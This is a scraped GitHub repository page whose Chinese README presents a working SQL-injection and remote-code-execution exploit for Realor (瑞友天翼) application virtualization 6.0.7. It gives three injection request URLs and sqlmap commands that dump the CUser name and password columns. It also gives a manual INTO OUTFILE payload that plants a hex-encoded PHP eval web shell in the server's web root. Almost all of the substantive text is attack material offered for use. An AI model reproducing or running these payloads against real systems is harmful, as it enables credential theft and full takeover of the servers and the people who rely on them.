hkxueqi
/
realor-sql-Injection-exp
Public
- Notifications
- Fork 2
-
Star 12
瑞友天翼sql-rce漏洞,远程代码执行-RCE-sql注入,realor-sql-Injection
12
stars
2
forks
Branches
Tags
Activity
Star
Notifications
hkxueqi/realor-sql-Injection-exp
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Branches Tags
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Latest commitHistory3 Commits | ||||
|
| |||
Repository files navigation
瑞友天翼应用虚拟化-远程代码执行/sql注入,realor-sql-Injection
前言
共有三个注入点,其实看了源码发现只要没加过滤函数的基本都有注入;即便加了过滤函数(过滤的很少),能否bypass后续也可以研究
POC
poc1:
http://url/AgentBoard.XGI?user='||'1&cmd=UserLogin
poc2:
/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182
poc3: GetBSAppUrl
EXP
exp1:
sqlmap -u 'http://url/AgentBoard.XGI?user='||'1' -D CASSystemDS -T CUser -C name,pwd --dump
sqlmap -u "" --file-write "/root/shell/shell-php/biaozun.php" --file-dest "C:\RealFriend\Rap Server\WebRoot\3.php"
#或者手动
http://172.16.1.200:8081/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2F3.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020406576616c28245f504f53545b22636d64225d293f3e--%20-&cmd=UserLogin
#需要修改绝对路径,内容是16进制,<?php @eval($_POST["cmd"])?>
上述用绝对路径不是最通用写shell方法,不细说了。
漏洞细节
复现环境:版本:6.0.7 查看版本:
/About.XGI
/CASMain.XGI?cmd=About
zend52解密xgi: http://dezend.qiling.org/free/
漏洞点:
登陆处是有过滤的,这里没有用过滤函数造成注入。
getshell直接sqlmap或者手动
About
瑞友天翼sql-rce漏洞,远程代码执行-RCE-sql注入,realor-sql-Injection
Resources
Readme
Activity
Stars
12
stars
Watchers
1
watching
Forks
2
forks
Report repository
Releases
No releases published
Packages 0
No packages published